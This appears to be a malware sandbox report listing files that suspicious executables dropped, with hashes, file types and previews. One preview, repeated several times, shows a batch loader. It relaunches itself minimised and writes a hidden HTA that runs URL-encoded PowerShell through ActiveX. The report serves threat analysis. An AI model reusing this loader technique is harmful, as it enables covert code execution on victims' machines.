                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\EdYEXasNiR.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5206016
                                                                                                                                                                                                                                                    Entropy (8bit):5.564218011157211
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:/5dL6ZDdy3R5it8PYXdjmJU7VVZr4JIMappEGc:/bgDdy3REt8PYXdyJqVVZEJIzH
                                                                                                                                                                                                                                                    MD5:3F6AB8A7E543EE65455B7D923402EF58
                                                                                                                                                                                                                                                    SHA1:192AA1F86EEB4B39E057A49FB9A2EE7AF94D1669
                                                                                                                                                                                                                                                    SHA-256:07C9218CCBA3CEE93DEDDB69C6AFCCD55AE878B07594BB00343D9C3331EB95D7
                                                                                                                                                                                                                                                    SHA-512:4B8E3B19CD5D238959B19E8AD4618C6FE113058A059281CDA238E20E544DEFA93DC11EAAE5829937E6BD6E4DF19EC97EAF22DFB9AEEA3955986E26A7381040D0
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........O...........@...........................O.......O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...losjkhko..*...$...*...$.............@...ybfttvsi.....pO......JO.............@....taggant.0....O.."...NO.............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21965
                                                                                                                                                                                                                                                    Entropy (8bit):5.377448864783034
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:rGbGMpOukkk8/McYuw8BsRhpuDaBUMiBaZdVsdgh3nIog:rGbGMph9TSNaaZIaZX1Iog
                                                                                                                                                                                                                                                    MD5:12E553CC7A522452A52C4B43EF2D06FA
                                                                                                                                                                                                                                                    SHA1:D84581A632CF5D0D124720DE0F679D52BAB49D16
                                                                                                                                                                                                                                                    SHA-256:0655F5B86BE27C8600AB9350F6A74389ABE37D0BDC9A533B90A9BD77F068C974
                                                                                                                                                                                                                                                    SHA-512:0C01D77E0CC9433F5E69D84E78A4B814EEE48A778512D1CE1919DCCD1F29627C0B661BCD1CD262F6FC9F9861DCFE05F50DA1107E50E0B0E92459301F64486CE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...MS_WINCE - Code specific to Windows CE..Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN3
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1050
                                                                                                                                                                                                                                                    Entropy (8bit):5.382088691477628
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:2dtn3mGv+zg4NnEN4XojC6vuVWV5rcb3S:ch35+zg4i0oKWmS
                                                                                                                                                                                                                                                    MD5:FEDFDF2256720BADEFF9205E784B5DC8
                                                                                                                                                                                                                                                    SHA1:014F80BBB14D6F9ED5FCF0757BF2BEF1A22B3B88
                                                                                                                                                                                                                                                    SHA-256:6373FB8261AF01506DC57DEE535A0BE800F3A59B18B0CC1E276807C746329FF6
                                                                                                                                                                                                                                                    SHA-512:F327A925FC067D0CBF06DE57DB791906629509CEE109CB3DBCA2349901EF4E41FD8BF33B56F5FAA647388F6266174960244E4F5CCA260F218440D9A1CC4DAA9B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <noInheritable/>.. <assemblyIdentity name="Microsoft.VC90.CRT" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.30729.4940"/>.. <file hash="c27a4547fb05f4fb4a675713da9fe280405d4e7b" hashalg="SHA1" name="msvcr90.dll"/>.. <file hash="965ba7119c94a3e462b0480492a114411a85c396" hashalg="SHA1" name="msvcp90.dll"/>.. <file hash="216d23bdea36a638d68a9f9287c25008a88285ad" hashalg="SHA1" name="msvcm90.dll"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>.. <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                    Entropy (8bit):5.328852065805165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:TMHdtnQEmW5v+8gVuNnhSN46J4b5JL5jb5Fapv18zyiUGXwcGkVtvXV3kQ1ysyG0:2dtn3mGv+8g4NnEN4xnJfaV5rcb3S
                                                                                                                                                                                                                                                    MD5:31F9D6D025D5208F518D6F0DCE5B9DA8
                                                                                                                                                                                                                                                    SHA1:7C5475FFD1EB4F3B73C41375125700F4D6380EA4
                                                                                                                                                                                                                                                    SHA-256:461A32142B53C15852B20372625EF22BCF6D62AB47D0D0936E9112A29477C56E
                                                                                                                                                                                                                                                    SHA-512:9542F980DED6AC649C2C3845BDFD093FF841CE627420C15319CFD1C8C23484B6A5461AFED332AB52F3C2942281CB7F88A8361EE4BED4C51528D4EF05431B4B98
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <noInheritable/>.. <assemblyIdentity name="Microsoft.VC90.MFC" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.21022.8"/>.. <file name="mfc90.dll"/>.. <file name="mfc90u.dll"/>.. <file name="mfcm90.dll"/>.. <file name="mfcm90u.dll"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>.. <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>.. </application>.. </compatibility>..</assembly>
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):92672
                                                                                                                                                                                                                                                    Entropy (8bit):6.49118781636951
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:+AcD5TPbhoah4Xg++9bq0nLfkkdk9R/Ec/PnzlHUU:G3+ah4XgrJnd+/PXn5HUU
                                                                                                                                                                                                                                                    MD5:6DAF8B55801A602F84D7D568A142459C
                                                                                                                                                                                                                                                    SHA1:57A80CA9621B282727D45CAA5AE1C5E3C7E93F60
                                                                                                                                                                                                                                                    SHA-256:66D0CB13569E9798B04C5D049CFF25BD4C7C8E7DDD885B62F523D90A65D0CE88
                                                                                                                                                                                                                                                    SHA-512:ABB1C17AEA3EDB46C096CA3D8CBF74C9DCCAD36A7B83BE8CF30697760AD49F3BD3A38DC4FF1F0B715AD7996C3A23EA1C855FFFD62AF01D15935ABC73378DCC2E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1101824
                                                                                                                                                                                                                                                    Entropy (8bit):6.872224946601528
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:wYeKOt9Hb/4BGjUIWbL5bEromH/1+Mb7zV+KpPoBsEeMZ1pSJx+waNJ:GQBjIwL98f7b7ZHMLpS3+waNJ
                                                                                                                                                                                                                                                    MD5:55A29EC9721C509A5B20D1A037726CFA
                                                                                                                                                                                                                                                    SHA1:EABA230581D7B46F316D6603EA15C1E3C9740D04
                                                                                                                                                                                                                                                    SHA-256:DBDCF9E8CBA52043B5246AD0D234DA8BA4D6534B326BBBB28A6A391EDF6FA4CE
                                                                                                                                                                                                                                                    SHA-512:E1A2993D4DD5F2E81F299FE158EE6D1F8EF95983113C9BEA9A087E42205FF06AC563762DE5A0B70B535EFE8CF9F980FFC14C1318AAF58DE3644277E3602E0AB3
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):46592
                                                                                                                                                                                                                                                    Entropy (8bit):6.53763754638404
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:LRZyVeIHZOETVI+KHtjEGDqFPBesNoC+M6Le+rA8X:deOETV1KH5qFPMC7gLDJ
                                                                                                                                                                                                                                                    MD5:3986998B3753483F8B28C721FEF6F8E4
                                                                                                                                                                                                                                                    SHA1:2EF3C0FAC94C85276721EE2980F49B1BAFEF597D
                                                                                                                                                                                                                                                    SHA-256:CBC23D6C2E3E2950452C7D255DA1452338301A4C9A0B09EBA83287709D2A5000
                                                                                                                                                                                                                                                    SHA-512:258E2805440B36E20702C1447597698EF18A5A7F890CFECE55BD4F797073C87E7BDE659DB3E2474E9B998213D76E2C3D5221659C6827237E06B3B6F4B3643AE6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1422336
                                                                                                                                                                                                                                                    Entropy (8bit):6.8498093470232755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:6ULSpvnsen1MiGl/hW5nGwwpMFmdLdl3Bp4vuPH5HUMecjhpXu4Fq+KpPZTx63g4:QvnZopheGwXk4i0Mo4ASgHpv5RKHjQj8
                                                                                                                                                                                                                                                    MD5:9BE53B53C1EC6B56663F45464EDFCDE9
                                                                                                                                                                                                                                                    SHA1:F8F5DD5640D594A2B53F5BBD12893C11CF4B7D55
                                                                                                                                                                                                                                                    SHA-256:B572BF14CA3D3E5158B89314B6FE2129A753EDACA1958E252784561F33F9ECDA
                                                                                                                                                                                                                                                    SHA-512:A52727B54A03246B74460A2741324B371CCAA083A4F3123FD1175A3061D3B6707DDBAAA73B3E39435CFFD8D3018EE2DEE8BAD6C58A17FAA55B6D05A3B38EE78B
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                    Entropy (8bit):6.335150855710927
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:sOWNT81C/gnCUUlUuaFVfmHZrGKcELCDOF3nNCeNXzEmSDEPY:sOWT81C/NtUu6VuZrGKcsCDOF3wIXzPX
                                                                                                                                                                                                                                                    MD5:BC22E37BC6345F1D973718A8E0531258
                                                                                                                                                                                                                                                    SHA1:CF80062912F529384D2BDEACCA035B7C0F69D691
                                                                                                                                                                                                                                                    SHA-256:2001D7FD09812D0BEE6E6FD0041F59120F907634ED36DDDB13E218F31CC61A45
                                                                                                                                                                                                                                                    SHA-512:E424DD8DB22B07E9EAB2B6FA4B977FF8C0FF19F94D3DD418EB8B88027273D276EC146A2E958D5BA649DE54E5C99260AB86DA24D8F096248F302CEEB58E610DA9
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                                                                    Entropy (8bit):5.200731153087669
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:tSVnGV7o5QUEZWm6UkDfvq3X7THIL3kOg:xVU5QUEz6dGLTH
                                                                                                                                                                                                                                                    MD5:0DD18B41247AD35DC34D2B3CC8A2CCFC
                                                                                                                                                                                                                                                    SHA1:24A71BB0FF79BD17BAC561242EAE789E58BDB8A1
                                                                                                                                                                                                                                                    SHA-256:4305325EC0E88CE4064C97E94D16A4131D3C7689946E6936A24D0A78A5B29052
                                                                                                                                                                                                                                                    SHA-512:8554659BCE0309FDABC1AE101963B3B4594DE028AE4E60E3BE12E157EB20AF75A7AAED6F0E042A75C8576F122CD7680DF168C710A00C5109EDE8A0FA0769096F
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):71168
                                                                                                                                                                                                                                                    Entropy (8bit):6.739969664926487
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:Ijfp8+QhToyh3Y1rr24S1uBXTZva+j+d8S+fkPPYnLr:IbLuYlq4SuXTZva+j+yZfWC
                                                                                                                                                                                                                                                    MD5:813C016E2898C6A2C1825B586DE0AE61
                                                                                                                                                                                                                                                    SHA1:7113EFCCCB6AB047CDFDB65BA4241980C88196F4
                                                                                                                                                                                                                                                    SHA-256:693DFC5CCB8555A4183D4E196865EF0A766D7E53087C39059D096D03D6F64724
                                                                                                                                                                                                                                                    SHA-512:DBB4ADD301EA127669D5DAC4226CE0F5D6E5B2E50773DB5C8083A9045A3CBA0FCF6EA253A1183A4C87752BD3C5EB84128103A6D8ADE71A7E410831B826D323AD
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):282394
                                                                                                                                                                                                                                                    Entropy (8bit):6.051428711388177
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:f3fLXd17U58fVZKlWm5plX0PXCRrcMBHADwYCuMslI:f3T37ZZa5LOCRrcMObm
                                                                                                                                                                                                                                                    MD5:C760591283D5A4A987AD646B35DE3717
                                                                                                                                                                                                                                                    SHA1:5D10CBD25AC1C7CED5BFB3D6F185FA150F6EA134
                                                                                                                                                                                                                                                    SHA-256:1A14F6E1FD11EFFF72E1863F8645F090EEC1B616614460C210C3B7E3C13D4B5E
                                                                                                                                                                                                                                                    SHA-512:C192AE381008EAF180782E6E40CD51834E0233E98942BD071768308E179F58F3530E6E883F245A2630C86923DBEB68B624C5EC2167040D749813FEDC37A6D1E6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1341
                                                                                                                                                                                                                                                    Entropy (8bit):5.280300736417038
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:2dtn3ZlglN2v+zg4NnEN4X1mc0+bLg4fNRme5rcb3S:ch3jgX2+zg4i01mJ+bLg4VRmemS
                                                                                                                                                                                                                                                    MD5:585BDFE3FA40F4667674269E31CB3CDB
                                                                                                                                                                                                                                                    SHA1:646DF297C69AEE3E57293521346118EDEBE248E2
                                                                                                                                                                                                                                                    SHA-256:DEC743E7FE1078B06B91D60B03609DE800D81756C61004B8F2F0234D15757903
                                                                                                                                                                                                                                                    SHA-512:A21F6E7E24BD736279A2A49CCEDBD94D2BD366673A5D9F0966CE5A2A5A1A1E2A6BBE68F39A525A8B3083AAC82D1B0A145FED52FBFA1A3505F1A17CA432F6F20D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <assemblyIdentity name="data" processorArchitecture="x86" type="win32" version="1.0.0.0"/>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.VC90.CRT" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.30729.4940"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity language="*" name="Microsoft.Windows.Common-Controls" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" type="win32" version="6.0.0.0"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-42
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1156600
                                                                                                                                                                                                                                                    Entropy (8bit):6.52546095742681
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:HMh/PZa3TrShmbjRbf/zxUK4BpifCqY5TcB2sQL+XmDOl:HMh/PZa3HTjtFUKwhqY5TcyL+XmE
                                                                                                                                                                                                                                                    MD5:462DDCC5EB88F34AED991416F8E354B2
                                                                                                                                                                                                                                                    SHA1:6F4DBB36A8E7E594E12A2A9ED4B71AF0FAA762C1
                                                                                                                                                                                                                                                    SHA-256:287BD98054C5D2C4126298EE50A2633EDC745BC76A1CE04E980F3ECC577CE943
                                                                                                                                                                                                                                                    SHA-512:35D21E545CE6436F5E70851E0665193BB1C696F61161145C92025A090D09E08F28272CBF1E271FF62FF31862544025290E22B15A7ACDE1AEA655560300EFE1EC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1162744
                                                                                                                                                                                                                                                    Entropy (8bit):6.531289155070338
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:ACmuzoNEIkc0FV/IvA+hJpHgbe18MVc/AKDbZOUWJGLaDenEKH:AC9zoNEIkbFV/IvA+hJyq1FVc/FDbZOQ
                                                                                                                                                                                                                                                    MD5:B9030D821E099C79DE1C9125B790E2DA
                                                                                                                                                                                                                                                    SHA1:79189E6F7887CA8F41FB17603BD9C2D46180EFCF
                                                                                                                                                                                                                                                    SHA-256:E30AABB518361FBEAF8068FFC786845EE84ABBF1F71AE7D2733A11286531595A
